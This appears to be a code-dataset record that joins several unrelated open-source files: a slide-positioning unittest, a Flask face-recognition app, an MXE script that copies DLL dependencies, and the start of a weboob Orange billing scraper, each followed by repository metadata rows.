"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "1",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r1600",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "0",
"data-y": "0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "90",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "r0",
"data-y": "r0",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": True,
},
{
"data-x": "3000",
"data-y": "1000",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "firstID+1000",
"data-y": "firstID-500",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
{
"data-x": "secondID+800",
"data-y": "200",
"data-z": "r0",
"data-rotate-x": "r0",
"data-rotate-y": "r0",
"data-rotate-z": "r0",
"data-scale": "r0",
"is_path": False,
},
],
)
class CalculateTests(unittest.TestCase):
"""Tests that positions are correctly calculated"""
def test_square(self):
# Slides, positioned in a square
positions = [
{"data-x": "0", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r1200", "data-y": "0"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r0", "data-y": "r-1000"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r-1200", "data-y": "r0"},
{"data-x": "r0", "data-y": "r1000"},
{"data-x": "r0", "data-y": "r1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3600,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1200,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -3000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": -1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_relative_positioning(self):
# Relative positioning is probably the most useful positioning.
# It allows you to insert or remove a slide, and everything adjusts.
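# (In these position strings a leading 'r' -- e.g. 'r1600' -- marks an offset relative
# to the previous slide, while a bare number is an absolute coordinate; that is what
# the expected values below exercise.)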
positions = [
# The first two slides are just default positons
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Then suddenly we move vertically!
{"data-x": "r0", "data-y": "r1000"},
# Continue the same way one slide.
{"data-x": "r0", "data-y": "r1000"},
# Stand still
{"data-x": "r0", "data-y": "r0"},
# Stand still again!
{"data-x": "r0", "data-y": "r0"},
# Move a little bit
{"data-x": "r-40", "data-y": "r-200"},
# Go back to normal movement to the right
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
# Absolute movement back to start!
{"data-x": "0", "data-y": "0"},
# Absolute movement to a center for end (with zoomout for example)
{"data-x": "3000", "data-y": "1000"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1560,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3160,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4760,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 6360,
"data-y": 1800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
def test_absolute_path(self):
# Position slides along a path
positions = [
{
"data-x": "r0",
"data-y": "r0",
"path": "M 100 100 L 300 100 L 300 300",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"is_path": True},
{"is_path": True},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 2000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 4000,
"data-y": 4000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_relative_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"is_path": True,
"path": "m 100 100 l 200 0 l 0 200",
},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r0", "data-y": "r0", "is_path": True},
{"data-x": "r1600", "data-y": "r0"},
{"data-x": "r0", "data-y": "r2400"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
# This point is exactly on a 90 degree angle. Therefore,
# its angle is calculated as 45 degrees, it being the
# average.
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 7200,
"data-y": 4800,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
],
)
def test_complex_path(self):
positions = [
{"data-x": "r0", "data-y": "r0"},
{"data-x": "r1600", "data-y": "r0"},
{
"data-x": "r1600",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
# Note that we don't change the rotation, so it stays at 90, here.
{"data-x": "0", "data-y": "0"},
# No new x and y, previous was absolute: Stay still!
{},
{
"data-x": "r0",
"data-y": "r0",
"path": "m 100 100 l 200 0 l 0 200",
"is_path": True,
},
{"is_path": True},
{"is_path": True},
{"data-x": "3000", "data-y": "1000", "data-rotate-z": "0"},
]
positions = list(calculate_positions(positions))
self.assertEqual(
positions,
[
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 1600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 3200,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 5600,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# Note that we don't change the rotation, so it stays at 90, here.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# No settings, still same place and rotation.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
# We start a path, but x and y are r0, so no movement.
# However, the rotation will come from the path, so it resets to 0.
{
"data-x": 0,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 0,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 44.99999999999999,
"data-scale": 1,
},
{
"data-x": 2400,
"data-y": 2400,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 90.0,
"data-scale": 1,
},
{
"data-x": 3000,
"data-y": 1000,
"data-z": 0,
"data-rotate-x": 0,
"data-rotate-y": 0,
"data-rotate-z": 0,
"data-scale": 1,
},
],
)
class PositionTest(unittest.TestCase):
def test_complete(self):
tree = make_tree("positioning.rst")
# Position the slides:
position_slides(tree)
# Get all slide position data:
positions = []
for step in tree.findall("step"):
pos = {}
for key in step.attrib:
if key.startswith("data-"):
pos[key] = step.attrib[key]
positions.append(pos)
self.assertEqual(
positions,
[
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "1600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
# Because of the path, we now get an explicit rotation:
{
"data-x": "3200",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
{
"data-x": "5600",
"data-y": "2400",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Rotation carries over from last part of path.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# No position change
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# No change at all.
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "90",
"data-scale": "1",
},
# Path starts, rotation comes from path:
{
"data-x": "0",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "0",
"data-scale": "1",
},
{
"data-x": "2400",
"data-y": "0",
"data-z": "0",
"data-rotate-x": "0",
"data-rotate-y": "0",
"data-rotate-z": "44.99999999999999",
"data-scale": "1",
},
# Explicit rotate-x and z, automatic position including rotate-z from path.
{
"data-x": "2400",
"data-y": "2400",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Explicit x and y, all other carry over from last slide.
{
"data-x": "3000",
"data-y": "1000",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning relative to other slide by id
{
"data-x": "4000",
"data-y": "500",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
# Positioning x relative to other slide by id, Explicit y
{
"data-x": "4800",
"data-y": "200",
"data-z": "1000",
"data-rotate-x": "180",
"data-rotate-y": "0",
"data-rotate-z": "90.0",
"data-scale": "1",
},
],
)
if __name__ == "__main__":
unittest.main()
| mit | -3,711,826,740,963,475,500 | 32.642544 | 91 | 0.287595 | false | 4.167051 | true | false | false |
Cydrobolt/spegill | spegill/__init__.py | 1 | 4011 | from . import config
from flask import Flask, request, render_template
import indicoio, requests
import ujson as json
from RedisLib import rds, R_SPEGILL_USER
import base64, hashlib
indicoio.config.api_key = config.indico_api_key
app = Flask('spegill')
app.secret_key = config.password
current_talking_user = ""
def append_to_redis_array(redis_key, new_entry):
# new_entry is an array that is to be combined with
# the existing array in `redis_key`
curr_redis_data = rds.get(redis_key)
if curr_redis_data is None:
curr_redis_data = "[]"
current_data = json.loads(curr_redis_data)
current_data += new_entry
new_redis_data = json.dumps(current_data)
rds.set(redis_key, new_redis_data)
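# Minimal usage sketch (the key name is made up for illustration):
#   append_to_redis_array('spegill:user:123:history', ['new entry'])
# reads the JSON-encoded list stored under the key (or starts from '[]'),
# extends it with the given entries and writes it back.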
def get_external_link(file_hash):
return "{}/{}.jpg".format(config.external_host, file_hash)
def retrain_dataset():
retrain_url = "https://apius.faceplusplus.com/v2/train/identify?api_secret={}&api_key={}&group_name=main".format(
config.facepp_api_secret, config.facepp_api_key
)
return requests.get(retrain_url).text
current_user = None
@app.route("/text_data", methods=["GET", "POST"])
def analyse_text():
input_text = request.form["text"]
user_key = current_talking_user
action = request.form.get("action")
if action == "political":
indico_response = indicoio.analyze_text(input_text, apis=['political'])
political_party = indico_response["political"]
top_political_party = sorted(political_party.keys(), key=lambda x: political_party[x], reverse=True)[0]
return top_political_party
else:
indico_response = indicoio.analyze_text(input_text, apis=['keywords'])
keywords = indico_response["keywords"]
keywords_ = sorted(keywords.keys(), key=lambda x: keywords[x], reverse=True)[:5]
# a bare list is not a valid Flask response, so serialize the top keywords to JSON
return json.dumps(keywords_)
@app.route("/image_create_person", methods=["GET", "POST"])
def create_person():
face_id_list = request.form.get("face_id_list")
obj_id_list = json.loads(face_id_list)
obj_csv_id_list = ",".join(obj_id_list)
post_url = config.facepp_compiled_person_path.format(obj_csv_id_list)
icp = requests.post(post_url)
return icp.text
@app.route("/update_user_data", methods=["GET", "POST"])
def update_user_data():
person_id = request.form.get("person_id")
user_dump = request.form.get("user_dump")
spegill_user_redis_key = R_SPEGILL_USER % person_id
rds.set(spegill_user_redis_key + ":dump", user_dump)
retrain_dataset()
return "OK"
@app.route("/image_recog_person", methods=["GET", "POST"])
def recog_person():
person_image_url = request.form.get("data_hash")
post_url = config.facepp_compiled_person_get_path.format(person_image_url)
irp = requests.post(post_url)
irpp = json.loads(irp.text)
try:
recog_first_match = irpp["face"][0]["candidate"][0]
recog_person_id = recog_first_match["person_id"]
recog_person_confidence = recog_first_match["confidence"]
if recog_person_confidence < 65:
return "NO MATCH"
spegill_user_redis_key = R_SPEGILL_USER % recog_person_id
result = rds.get(spegill_user_redis_key + ":dump")
return result
except:
return "ERR"
@app.route("/image_data", methods=["GET", "POST"])
def analyse_image():
image_b64 = request.form["b64_image"][22:]
img_data = base64.b64decode(image_b64)
h = hashlib.sha256()
h.update(image_b64)
file_hash = h.hexdigest()
filename = 'spegill/static/{}.jpg'.format(file_hash)
with open(filename, 'wb') as f:
f.write(img_data)
spegill_external_path = get_external_link(file_hash)
facepp_request_path = config.facepp_compiled_path.format(spegill_external_path)
r = requests.get(facepp_request_path)
return json.dumps({"o": r.text, "ha": spegill_external_path})
@app.route("/add")
def add_ads():
return render_template("add.html")
@app.route("/")
def root():
return render_template("video.html")
| gpl-2.0 | 6,634,910,512,847,834,000 | 30.093023 | 117 | 0.659686 | false | 3.094907 | true | false | false |
Bitcoinsulting/dark-test-v2 | libjl777/mxe/tools/copydlldeps.py | 3 | 7082 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# DLL dependency resolution and copying script.
# Copyright (C) 2010 John Stumpo
# Copyright (C) 2014 Martin Müllenhaupt
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import shutil
import struct
import sys
def is_pe_file(file):
if not os.path.isfile(file): # Skip directories
return False
f = open(file, 'rb')
if f.read(2) != b'MZ':
return False # DOS magic number not present
f.seek(60)
peoffset = struct.unpack('<L', f.read(4))[0]
f.seek(peoffset)
if f.read(4) != b'PE\0\0':
return False # PE magic number not present
return True
def get_imports(file):
f = open(file, 'rb')
# We already know it's a PE, so don't bother checking again.
f.seek(60)
pe_header_offset = struct.unpack('<L', f.read(4))[0]
# Get sizes of tables we need.
f.seek(pe_header_offset + 6)
number_of_sections = struct.unpack('<H', f.read(2))[0]
f.seek(pe_header_offset + 116)
number_of_data_directory_entries = struct.unpack('<L', f.read(4))[0]
data_directory_offset = f.tell() # it's right after the number of entries
# Where is the import table?
f.seek(data_directory_offset + 8)
rva_of_import_table = struct.unpack('<L', f.read(4))[0]
# Get the section ranges so we can convert RVAs to file offsets.
f.seek(data_directory_offset + 8 * number_of_data_directory_entries)
sections = []
for i in range(number_of_sections):
section_descriptor_data = f.read(40)
name, size, va, rawsize, offset = \
struct.unpack('<8sLLLL', section_descriptor_data[:24])
sections.append({'min': va, 'max': va+rawsize, 'offset': offset})
def seek_to_rva(rva):
for s in sections:
if s['min'] <= rva and rva < s['max']:
f.seek(rva - s['min'] + s['offset'])
return
raise ValueError('Could not find section for RVA.')
# Walk the import table and get RVAs to the null-terminated names of DLLs
# this file uses. The table is terminated by an all-zero entry.
seek_to_rva(rva_of_import_table)
dll_rvas = []
while True:
import_descriptor = f.read(20)
if import_descriptor == b'\0' * 20:
break
dll_rvas.append(struct.unpack('<L', import_descriptor[12:16])[0])
# Read the DLL names from the RVAs we found in the import table.
dll_names = []
for rva in dll_rvas:
seek_to_rva(rva)
name = b''
while True:
c = f.read(1)
if c == b'\0':
break
name += c
dll_names.append(name.decode("ascii"))
return dll_names
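# Rough usage sketch (the file name and output are illustrative only):
#   >>> get_imports('myprog.exe')
#   ['KERNEL32.dll', 'msvcrt.dll', 'QtCore4.dll']
# The caller is expected to have checked is_pe_file() first, as done in __main__ below.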
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Recursive copy of DLL dependencies')
parser.add_argument('targetdir',
type=str,
help='target directory where to place the DLLs')
parser.add_argument('-C',
'--checkdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='directories whose dependencies must be ' +
'fulfilled. All PE files will be checked ' +
'(mostly .exe and .dll files)',
dest='checkdirs')
parser.add_argument('-L',
'--libdir',
type=str,
action='append',
nargs='+',
default=[],
required=True,
help='include directories to search for DLL ' +
'dependencies (only .dll files will be used ' +
'from here)',
dest='libdirs')
args = parser.parse_args()
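# Hypothetical invocation (the paths are examples, not part of this script):
#   python copydlldeps.py ./dist -C ./dist -L /opt/mxe/usr/i686-w64-mingw32.shared/bin
# copies every DLL that the PE files in ./dist depend on, recursively, into ./dist.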
if sys.version_info < (3, 0):
from sets import Set as set
# Map from shortname ('qtcore4.dll') to full path (eg.
# '/.../mxe/i686-w64-mingw32.shared/qt/bin/QtCore4.dll')
available_dlls = dict()
# Remember already copied DLLs (eg 'qtcore4.dll', 'qtgui4.dll')
copied_dlls = set()
# Remember which DLLs must still be checked (eg 'qtnetwork4.dll',
# 'qtgui4.dll')
dlls_to_copy = set()
not_found_dlls = set()
# Create a list of all available .dll files in the libdir directories
# Flattening list: http://stackoverflow.com/questions/952914
for libdir in [item for sublist in args.libdirs for item in sublist]:
for dll_filename in os.listdir(libdir):
dll_filename_full = os.path.join(libdir, dll_filename)
if dll_filename.endswith('.dll') and is_pe_file(dll_filename_full):
available_dlls[dll_filename.lower()] = dll_filename_full
# Create a list of initial dependencies (dlls_to_copy) and already copied
# DLLs (copied_dlls) from the checkdir arguments.
# Flattening list: http://stackoverflow.com/questions/952914
for checkdir in [item for sublist in args.checkdirs for item in sublist]:
for pe_filename in os.listdir(checkdir):
pe_filename_full = os.path.join(checkdir, pe_filename)
if is_pe_file(pe_filename_full):
for dependency_dll in get_imports(pe_filename_full):
dlls_to_copy.add(dependency_dll.lower())
if pe_filename.endswith('.dll'):
copied_dlls.add(pe_filename.lower())
while len(dlls_to_copy):
# We may not change the set during iteration
for dll_to_copy in dlls_to_copy.copy():
if dll_to_copy in copied_dlls:
None
elif dll_to_copy in not_found_dlls:
None
elif dll_to_copy in available_dlls:
shutil.copyfile(available_dlls[dll_to_copy],
os.path.join(args.targetdir,
os.path.basename(available_dlls[dll_to_copy])))
copied_dlls.add(dll_to_copy.lower())
for dependency_dll in get_imports(available_dlls[dll_to_copy]):
dlls_to_copy.add(dependency_dll.lower())
else:
not_found_dlls.add(dll_to_copy)
dlls_to_copy.remove(dll_to_copy)
print("Missing dll files: " + ", ".join(not_found_dlls))
| mit | -8,668,788,728,360,593,000 | 39.00565 | 79 | 0.573365 | false | 3.792716 | false | false | false |
laurentb/weboob | modules/orange/pages/bills.py | 1 | 9949 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Vincent Paredes
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
try:
from html.parser import HTMLParser
except ImportError:
import HTMLParser
from weboob.browser.pages import HTMLPage, LoggedPage, JsonPage
from weboob.capabilities.bill import Subscription
from weboob.browser.elements import DictElement, ListElement, ItemElement, method, TableElement
from weboob.browser.filters.standard import (
CleanDecimal, CleanText, Env, Field,
Regexp, Date, Currency, BrowserURL,
Format, Eval, Lower,
)
from weboob.browser.filters.html import Link, TableCell
from weboob.browser.filters.javascript import JSValue
from weboob.browser.filters.json import Dict
from weboob.capabilities.base import NotAvailable
from weboob.capabilities.bill import DocumentTypes, Bill
from weboob.tools.date import parse_french_date
from weboob.tools.compat import urlencode
class BillsApiProPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'bills'
# orange's API will sometimes return the temporary bill for the current month along with other bills
# in the JSON. The URL leads to the exact same document; this is probably not intended behaviour and
# causes weboob to raise a DataError as they'll have identical ids.
ignore_duplicate = True
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('dueDate'), parse_func=parse_french_date, default=NotAvailable)
obj_price = CleanDecimal(Dict('amountIncludingTax'))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
def get_params(self):
params = {'billid': Dict('id')(self), 'billDate': Dict('dueDate')(self)}
return urlencode(params)
obj_url = BrowserURL('doc_api_pro', subid=Env('subid'), dir=Dict('documents/0/mainDir'), fact_type=Dict('documents/0/subDir'), billparams=get_params)
obj__is_v2 = False
class BillsApiParPage(LoggedPage, JsonPage):
@method
class get_bills(DictElement):
item_xpath = 'billsHistory/billList'
class item(ItemElement):
klass = Bill
obj_date = Date(Dict('date'), default=NotAvailable)
obj_price = Eval(lambda x: x / 100, CleanDecimal(Dict('amount')))
obj_format = 'pdf'
def obj_label(self):
return 'Facture du %s' % Field('date')(self)
def obj_id(self):
return '%s_%s' % (Env('subid')(self), Field('date')(self).strftime('%d%m%Y'))
obj_url = Format('%s%s', BrowserURL('doc_api_par'), Dict('hrefPdf'))
obj__is_v2 = True
# is BillsPage deprecated ?
class BillsPage(LoggedPage, HTMLPage):
@method
class get_bills(TableElement):
item_xpath = '//table[has-class("table-hover")]/div/div/tr | //table[has-class("table-hover")]/div/tr'
head_xpath = '//table[has-class("table-hover")]/thead/tr/th'
col_date = 'Date'
col_amount = ['Montant TTC', 'Montant']
col_ht = 'Montant HT'
col_url = 'Télécharger'
col_infos = 'Infos paiement'
class item(ItemElement):
klass = Bill
obj_type = DocumentTypes.BILL
obj_format = "pdf"
# TableCell('date') can have other info like: 'duplicata'
obj_date = Date(CleanText('./td[@headers="ec-dateCol"]/text()[not(preceding-sibling::br)]'), parse_func=parse_french_date, dayfirst=True)
def obj__cell(self):
# sometimes the link to the bill is not in the right column (Thanks Orange!!)
if CleanText(TableCell('url')(self))(self):
return 'url'
return 'infos'
def obj_price(self):
if CleanText(TableCell('amount')(self))(self):
return CleanDecimal(Regexp(CleanText(TableCell('amount')), '.*?([\d,]+).*', default=NotAvailable), replace_dots=True, default=NotAvailable)(self)
else:
return Field('_ht')(self)
def obj_currency(self):
